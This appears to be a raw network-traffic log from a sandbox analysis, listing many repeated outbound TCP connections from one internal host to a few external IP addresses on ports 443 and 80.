        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 142.250.186.142:443
        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49187 -> 192.3.176.141:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 216.58.212.174:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.159.62.244:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.159.62.243:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 142.250.186.97:443
